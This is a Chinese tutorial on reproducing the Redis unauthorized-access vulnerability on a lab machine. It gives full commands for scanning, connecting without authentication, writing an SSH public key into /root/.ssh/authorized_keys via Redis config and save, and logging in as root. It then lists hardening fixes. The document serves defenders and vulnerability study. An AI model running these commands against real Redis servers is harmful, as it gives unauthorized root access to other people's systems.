Redis未授权访问漏洞复现教程（redis未授权访问漏洞复现教程视频）

1、漏洞背景

Redis因配置不当会导致未授权访问漏洞而被攻击者恶意利用。如果没有开启认证且Redis以root用户运行，任意用户可以在访问目标服务器的情况下将SSH公钥写入root用户文件，通过使用对应SSH私钥登录目标服务器，致使服务器权限被获取、数据信息泄露或加密勒索等事件发生，严重危害业务正常服务。

2、漏洞描述及影响

在默认情况下，Redis是允许远程连接的，默认端口是6379。在没有开启认证并且任意用户可以访问目标服务器的情况下，攻击者可以利用Redis的相关方法未授权访问Redis。如果运行Redis的用户是root用户，攻击者在本地创建一对公私钥（公钥文件：~/.ssh/id_rsa.pub；私钥文件：~/.ssh/id_rsa），再利用redis-cli客户端对靶机的redis-server进行远程连接，将公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中， SSH公私钥匹配成功后可登录目标服务器。

Redis作为数据库，保存着用户信息等重要数据信息。如果攻击者未授权访问Redis，将会导致数据信息和服务器信息泄露，甚至出现代码执行、获取服务器权限等恶意操作。

该漏洞若被利用，需要满足的条件如下：

（1）Redis以root用户运行；

（2）Redis无密码或弱密码进行认证；

（3）Redis监听在0.0.0.0公网上（绑定在0.0.0.0：6379，对公网开放）；

（4）目标服务器开放了SSH服务，而且允许使用密钥登录。

3、漏洞检测与利用

（1）、此次的搭建了一个靶机，地址是192.168.110.128，利用F-NAscan、nmap等扫描工具，扫描目标地址端口开放情况，如果22（SSH）、6379（Redis）端口处于开放状态，则目的地址可能存在此漏洞。

如果检测到目标地址6379处于开放状态，可利用6379端口检测、获取目标地址的Redis信息：

# nmap -A -p6379 --script=redis-info 192.168.110.128（目标地址）

（2）尝试未授权访问靶机Redis，通过以下命令连接靶机Redis并查看info：

# ./redis-cli -h 192.168.110.128

（3）在本地（攻击方）生成一对ssh key(如果已经生成过则可跳过此步骤。默认情况下，生成后在本地目录下的.ssh目录下)：

# ssh-keygen -t rsa

（4）将生成的公钥写入foo.txt（加上\n\n是为了不破坏ssh public key，公钥如图所示）：

# cd ~/.ssh
# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt

（5）将foo.txt写入Redis,连接靶机Redis，设置备份路径为/root/.ssh/，设置备份文件的名称为authorized_keys并保存，完成文件写入（crackit是设置的 key，可随意指定）：

# cat /tmp/foo.txt | /usr/redis/./redis-cli -h 192.168.110.128 -p 6379 -x set crackit
# ./redis-cli -h 192.168.110.128 -p 6379 
192.168.110.128:6379> config set dir /root/.ssh/ 
OK 
192.168.110.128:6379> config get dir 
1) "dir" 
2) "/root/.ssh" 
192.168.110.128:6379> config set dbfilename "authorized_keys" 
OK 
192.168.110.128:6379> save 
OK

（6）利用私钥远程登录目标服务器，默认会使用 id_rsa, 如果改过文件名则可以用 -i 参数来自指定文件：

# ssh root@192.168.110.128 -i id_rsa

4、修复建议

（1）禁止Redis对公网开放，指定Redis使用的网卡。Redis本来就是作为内存数据库，只要监听在本机即可。可通过修改redis.conf配置文件中的"#bind 127.0.0.1" ，去掉前面的"#"即可，或修改为指定访问源IP访问（需要重启Redis才能生效）。

# bind 127.0.0.1

（2）防火墙限制访问源IP。如果正常业务中Redis服务需要被其他服务器来访问，可以设置iptables策略仅允许指定的IP来访问Redis服务。

# iptables -A INPUT -s [可访问IP] -p tcp --dport 6379 -j ACCEPT

（3）修改Redis默认端口，将默认的6379端口修改为其他端口。

（4）设置密码访问认证，可通过修改Redis.conf配置文件中的"requirepass" ,去掉前面的“#”并设置复杂密码（需要重启Redis才能生效）。

# requirepass rt%dPf&2342UWF#^32

（5）Redis使用普通用户权限，禁止使用root权限启动Redis，这样可以保证在存在漏洞的情况下攻击者也只能获取到普通用户权限，无法获取root权限（需要重启Redis才能生效）。创建一个无home目录和无法登陆的普通权限账号

# useradd -M -s /sbin/nologin [用户名]

（6）修改Redis config指令。在redis2.8.1及redis3.x(<3.0.2) 版本下存在eval沙箱逃逸漏洞，攻击者可通过该漏洞执行任意Lua代码。禁用config指令有助于避免恶意操作。具体的congfig指令有：FLUSHDB, FLUSHALL, KEYS,PEXPIRE, DEL, CONFIG, SHUTDOWN, BGREWRITEAOF, BGSAVE, SAVE, SPOP, SREM, RENAME,DEBUG, EVAL等。在Redis配置文件redis.conf中配置rename-command项"RENAME_CONFIG"，这样即使存在未授权访问，也能够给攻击者使用config 指令加大难度，缓解攻击操作。下述配置将config/flushdb/flushall设置为空（即禁用该命令），也可命名一些攻击者难以猜解的名字，保存后执行/etc/init.d/redis-server restart重启生效。

rename-command CONFIG “”
rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52
rename-command flushall “”
rename-command flushdb “”
rename-command shutdown shotdown_test

（7）及时更新安全补丁，升级redis到最新版，防止新漏洞被利用。